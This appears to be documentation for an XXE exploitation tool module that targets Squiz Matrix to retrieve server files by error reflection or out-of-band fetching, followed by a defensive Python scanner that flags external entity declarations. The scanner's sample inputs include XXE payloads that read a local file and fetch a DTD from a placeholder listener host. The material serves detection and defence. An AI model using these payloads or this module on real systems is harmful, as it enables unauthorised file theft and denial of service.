This module utilizes error-message-based reflection to retrieve the contents of the target file, but the contents are base64-encoded before inclusion, so binary data can generally be retrieved. It is mainly included for demonstration purposes. Use of the SOS-12-007-YU-OOB module is strongly recommended instead.

Squiz Matrix is a PHP-based application, so directory content enumeration is not possible: a specific target file (or list of specific target files) must be specified. In addition, while text and binary content can both be retrieved, the maximum file size is limited to about 4 KB unless certain components on the target were compiled with nonstandard options.

This module uses Yunusov-Osipov-style out-of-band exploitation of a PHP-based application. As a result, it requires the use of an instance of She Wore A Mirrored Mask which is accessible (either directly, or via transparent TCP port-forwarding) to the target system.

This module will generally *not* be successful at sending XXE denial-of-service attacks (--dos-lulz or --dos-quad).
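Both the error-message-based retrieval and the out-of-band technique described above depend on the target's XML parser resolving external entities declared in the request's DTD. The following defender-side check is an added example, not part of the original module documentation: it scans an inbound XML body for external identifiers and reports whether resolving them would need an outbound connection. The names `scan_xml_body` and `requires_egress` and all sample documents are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# <!DOCTYPE name [external id] [ internal subset ]>
DOCTYPE_RE = re.compile(
    r"<!DOCTYPE\b(?P<head>[^\[>]*)(?:\[(?P<subset>.*?)\]\s*)?>", re.S)
# <!ENTITY [%] name rest>  ('%' marks a parameter entity)
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s+)?(?P<name>[^\s>]+)\s+(?P<rest>[^>]*)>", re.S)
# SYSTEM "uri"   or   PUBLIC "pubid" "uri"
EXTERNAL_ID_RE = re.compile(
    r"""(?:SYSTEM|PUBLIC\s+(?:"[^"]*"|'[^']*'))\s+(?P<q>["'])(?P<uri>.*?)(?P=q)""",
    re.S)
NETWORK_SCHEMES = {"http", "https", "ftp"}

def _scheme(uri: str) -> str:
    return urlsplit(uri).scheme.lower() or "relative"

def scan_xml_body(body: str) -> list[tuple[str, str, str]]:
    """Return (kind, entity_name, uri_scheme) for every external identifier."""
    findings = []
    for doctype in DOCTYPE_RE.finditer(body):
        ext = EXTERNAL_ID_RE.search(doctype.group("head"))
        if ext:  # the DTD itself is fetched from elsewhere
            findings.append(("external-subset", "", _scheme(ext.group("uri"))))
        for ent in ENTITY_RE.finditer(doctype.group("subset") or ""):
            ext = EXTERNAL_ID_RE.match(ent.group("rest"))
            if ext:
                kind = ("external-parameter-entity" if ent.group("param")
                        else "external-general-entity")
                findings.append((kind, ent.group("name"), _scheme(ext.group("uri"))))
    return findings

def requires_egress(findings) -> bool:
    """True if resolving any finding needs an outbound network connection."""
    return any(scheme in NETWORK_SCHEMES for _, _, scheme in findings)

# Constructed sample request bodies (hosts and paths are placeholders).
SAMPLES = {
    "plain": '<?xml version="1.0"?><request><id>42</id></request>',
    "internal_entity": '<!DOCTYPE r [<!ENTITY a "text">]><r>&a;</r>',
    "external_general":
        '<!DOCTYPE r [<!ENTITY e SYSTEM "file:///placeholder/path">]><r>&e;</r>',
    "external_parameter":
        '<!DOCTYPE r [<!ENTITY % p SYSTEM "http://listener.example/x.dtd"> %p;]><r/>',
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        hits = scan_xml_body(body)
        print(label, hits, "egress" if requires_egress(hits) else "local")
```

This regex scan is a pre-filter for logs or a request gateway, not a substitute for configuring the application's XML parser to refuse DTDs and external entities. A finding that requires egress is also a cue to check whether the application host can open outbound connections at all, since the out-of-band variant needs the target to reach the listener.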